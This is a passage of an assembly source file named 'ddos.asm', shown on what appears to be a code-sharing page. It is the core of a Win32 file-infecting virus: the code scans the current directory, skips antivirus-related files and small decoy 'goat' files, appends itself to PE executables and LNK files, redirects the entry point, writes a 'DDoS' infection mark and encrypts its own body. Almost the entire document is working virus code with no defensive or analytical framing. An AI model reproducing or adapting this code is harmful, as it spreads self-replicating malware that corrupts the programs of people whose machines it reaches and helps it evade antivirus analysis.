📄 ddos.asm
字号:
xchg eax, edi ; save PE address in eax
xchg ebx, esi ; save MZ address in ebx
cld
ret
NoKernel: ; if not found we don't set the carriage flag
stc
ret ; return if not found
K32Trys db 5h ; Search-Range
; ***************************************************************************
; -----------------[ Infection of the current directory ]--------------------
; ***************************************************************************
InfectCurDir: ; Here we infect the files in the current directory
; we use the FindFirstFile - FindNextFile API's
; to scan all files for PE-Executables and
; LNK-Files.
lea esi, [ebp+filemask]
call FindFirstFileProc
inc eax
jz EndInfectCurDir1 ; If there are no files, we return
dec eax
InfectCurDirFile:
; filename in esi
lea esi, [ebp+WFD_szFileName]
call InfectFile ; Try to infect it !
cmp [ebp+InfCounter], 0h ; if we infected enough files
jna EndInfectCurDir2 ; we return
call FindNextFileProc
test eax, eax
jnz InfectCurDirFile
EndInfectCurDir2: ; we close the search - Handle
push dword ptr [ebp+FindHandle]
call dword ptr [ebp+XFindClose]
EndInfectCurDir1: ; we just return
ret
InfCounter db 0h ; Counter for the number of files we infect
; at max in the current directory
; ( could take too long if we want to infect them
; all )
FindHandle dd 0h ; The handle for the FindFirstFile API
filemask db '*.*', 0 ; we search for all files, not just exe files
; these structures are nessecairy
; for the FindFileFirst - FindFileNext API's
; ***************************************************************************
; ---------------------[ Prepare infection of file ]------------------------
; ***************************************************************************
InfectFile: ; Here we prepare to infect the file
; the filename is in [ebp+WFD_szFileName]
; we open it and check if it is something
; we are able to infect...
; esi points to the filename..
cmp byte ptr [esi], '.' ; check if we got .. or .
je NoInfection
; if the file is smaller than
; 200 Bytes it will not get checked or
; infected !
cmp dword ptr [ebp+WFD_nFileSizeLow], 200d
jbe NoInfection
; we also don't infect it if it is too big
cmp dword ptr [ebp+WFD_nFileSizeHigh], 0
jne NoInfection
call CheckFileName ; check for AV-Files
jc NoInfection
; Get File-Attributes
lea eax, [ebp+WFD_szFileName]
push eax
call dword ptr [ebp+XGetFileAttributesA]
; save them
mov dword ptr [ebp+Attributes], eax
inc eax
jz NoInfection ; if we failed we don't infect
dec eax
push 80h ; clean attributes
lea eax, [ebp+WFD_szFileName]
push eax
call dword ptr [ebp+XSetFileAttributesA]
or eax, eax ; if we fail, we don't open the file
jz NoInfection ; if we have no access to set the attributes,
; we will surely not be allowed to change the file itself
call OpenFile ; open the file
jc NoInfection ; if we failed we don't infect..
mov esi, eax
call CheckMZSign ; if it is an EXE file, we go on
jc CheckLNK ; otherwise we test if it is a LNK
cmp word ptr [eax+3Ch], 0h
je CheckLNK
xor esi, esi ; get the start of the PE-Header
mov esi, [eax+3Ch]
; if it lies outside the file we skip it
cmp dword ptr [ebp+WFD_nFileSizeLow], esi
jb Notagoodfile
add esi, eax
mov edi, esi
call CheckPESign ; check if it is an PE-Executable
jc Notagoodfile
; check infection mark --> DDoS
; if it is there the file is already infected..
cmp dword ptr [esi+4Ch], 'SoDD'
jz Notagoodfile
mov bx, word ptr [esi+16h]; get characteristics
and bx, 0F000h ; we need just the Dll-Flag
cmp bx, 02000h
je Notagoodfile ; we will not infect dll-files
mov bx, word ptr [esi+16h]; get characteristics again
and bx, 00002h ; we check if it is no OBJ or something else..
cmp bx, 00002h
jne Notagoodfile
call InfectEXE ; ok, infect it !
; if there occoured an error
; while mapping the file again,
; we don't need to unmap & close it
jc NoInfection
jmp Notagoodfile
CheckLNK: ; check if we got an LNK-File
mov esi, dword ptr [ebp+MapAddress]
cmp word ptr [esi], 'L' ; check for sign
jne UnMapFile ; if it is no LNK File we close it
call InfectLNK
Notagoodfile:
call UnMapFile ; we store the file..
; we restore the file-attributes
push dword ptr [ebp+Attributes]
lea eax, [ebp+WFD_szFileName]
push eax
call dword ptr [ebp+XSetFileAttributesA]
NoInfection:
ret
; ***************************************************************************
; ------------------------[ Open and close Files ]---------------------------
; ***************************************************************************
OpenFile:
xor eax,eax ; let's open the file
push eax
push eax
push 3h
push eax
inc eax
push eax
push 80000000h or 40000000h
push esi ; name of file
call dword ptr [ebp+XCreateFileA]
inc eax
jz Closed ; if there is an error we don't infect the file
dec eax ; now the handle is in eax
; we save it
mov dword ptr [ebp+FileHandle],eax
; if we map a file normal, we map it with the size
; in the Find32-Data
; otherwise it is in ecx
mov ecx, dword ptr [ebp+WFD_nFileSizeLow]
CreateMap:
push ecx ; save the size
xor eax,eax ; we create a map of the file to
push eax ; be able to edit it
push ecx
push eax
push 00000004h
push eax
push dword ptr [ebp+FileHandle]
call dword ptr [ebp+XCreateFileMappingA]
mov dword ptr [ebp+MapHandle],eax
pop ecx ; get the size again..
test eax, eax ; if there is an error we close the file
jz CloseFile ; no infection today :(
xor eax,eax ; we map the file.. *bla*
push ecx
push eax
push eax
push 2h
push dword ptr [ebp+MapHandle]
call dword ptr [ebp+XMapViewOfFile]
or eax,eax ; if there is an error, we unmap it
jz UnMapFile
; eax contains the offset where
; our file is mapped.. *g*
mov dword ptr [ebp+MapAddress],eax
; Clear c-flag for successful opening
clc
ret ; we successfully opened it !
UnMapFile: ; ok, unmap it
call UnMapFile2
CloseFile: ; let's close it
push dword ptr [ebp+FileHandle]
call [ebp+XCloseHandle]
Closed:
stc ; set carriage flag
ret
UnMapFile2: ; we need to unmap it some times, to
; map it again with more space..
push dword ptr [ebp+MapAddress]
call dword ptr [ebp+XUnmapViewOfFile]
push dword ptr [ebp+MapHandle]
call dword ptr [ebp+XCloseHandle]
ret
; ***************************************************************************
; -------------------------[ Infect an EXE-FILE ]----------------------------
; ***************************************************************************
InfectEXE: ; MapAddress contains the starting offset of the file
; we will not infect exe files, which are smaller than
; 40 Kb, this is for avoiding goat files.
; AV's use them to study viruses !
cmp dword ptr [ebp+WFD_nFileSizeLow] , 0A000h
jb NoEXE
mov ecx, [esi+3Ch] ; esi points to the PE-Header
; ecx contains file-alignment
; put size in eax
mov eax, dword ptr [ebp+WFD_nFileSizeLow]
add eax, dword ptr [ebp+VirLen]
call Align ; align it and save the new size
mov dword ptr [ebp+NewSize], eax
xchg ecx, eax
pushad ; save registers
; we close the file and map it again,
; but this time we will load it
; with some more space, so we can add
; our code *eg*
call UnMapFile2
popad
call CreateMap ; we map it again with a bigger size
; if we got an error we return
jc NoEXE
; make esi point to the PE-Header again
; get offset
mov esi, dword ptr [eax+3Ch]
; make it VA
add esi, eax
mov edi, esi ; edi = esi
; eax = number of sections
movzx eax, word ptr [edi+06h]
dec eax
imul eax, eax, 28h ; multiply with size of section header
add esi, eax ; make it VA
add esi, 78h ; make it point to dir table
; esi points now to the dir-table
mov edx, [edi+74h] ; get number of dir - entrys
shl edx, 3h ; multiply with 8
add esi, edx ; make point to the last section
; get the Entry Point and save it
; we need it to be able to return
; to the original file
mov eax, [edi+28h]
mov dword ptr [ebp+OldEIP], eax
; get the imagebase, also needed to
; execute original file
mov eax, [edi+34h]
mov dword ptr [ebp+OldBase], eax
mov edx, [esi+10h] ; size of raw data
; we will increase it later
mov ebx, edx
add edx, [esi+14h] ; edx = Pointer to raw-data
push edx ; save it in stack
mov eax, ebx
add eax, [esi+0Ch] ; make it VA
; this is our new EIP
mov [edi+28h], eax
mov dword ptr [ebp+NewEIP], eax
mov eax, [esi+10h] ; get size of Raw-data
push eax
add eax, dword ptr [ebp+VirLen]
; increase it
mov ecx, [edi+3Ch] ; Align it
call Align
; save it in the file as
; new size of rawdata and
mov [esi+10h], eax
pop eax ; new Virtual size
add eax, dword ptr [ebp+VirLen]
add eax, Buffersize
mov [esi+08h], eax
pop edx
mov eax, [esi+10h]
add eax, [esi+0Ch] ; New Size of Image
; save it in the file
mov [edi+50h], eax
; change section flags to make
; us have write & read access to it
; when the infected file is run
; we also set the code flag.. ;)
or dword ptr [esi+24h], 0A0000020h
; we write our infection mark to the program,
; so we will not infect it twice
; --> DDoS
mov dword ptr [edi+4Ch], 'SoDD'
push edi ; save them
push edx
push 10d
pop ecx
call GetRand ; get random number ( we'll use the EAX value )
pop edi ; restore and xchange
pop edx
mov word ptr [ebp+Key], ax
push eax ; save it 2 times
lea esi, [ebp+Virus] ; point to start of virus
add edi, dword ptr [ebp+MapAddress]
push edi ; save edi
mov ecx, dword ptr [ebp+VirLen]
; get size of virus in ecx
rep movsb ; append virus !
pop esi ; decrypt the virus
mov edi, esi
add esi, NoCrypt
mov ecx, (CryptSize / 2)
pop edx ; get key from stack
push edi ; save start
mov edi, esi
EnCryptLoop: ; decrypt with second layer
lodsw
not ax
inc dx
xchg dl, dh
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -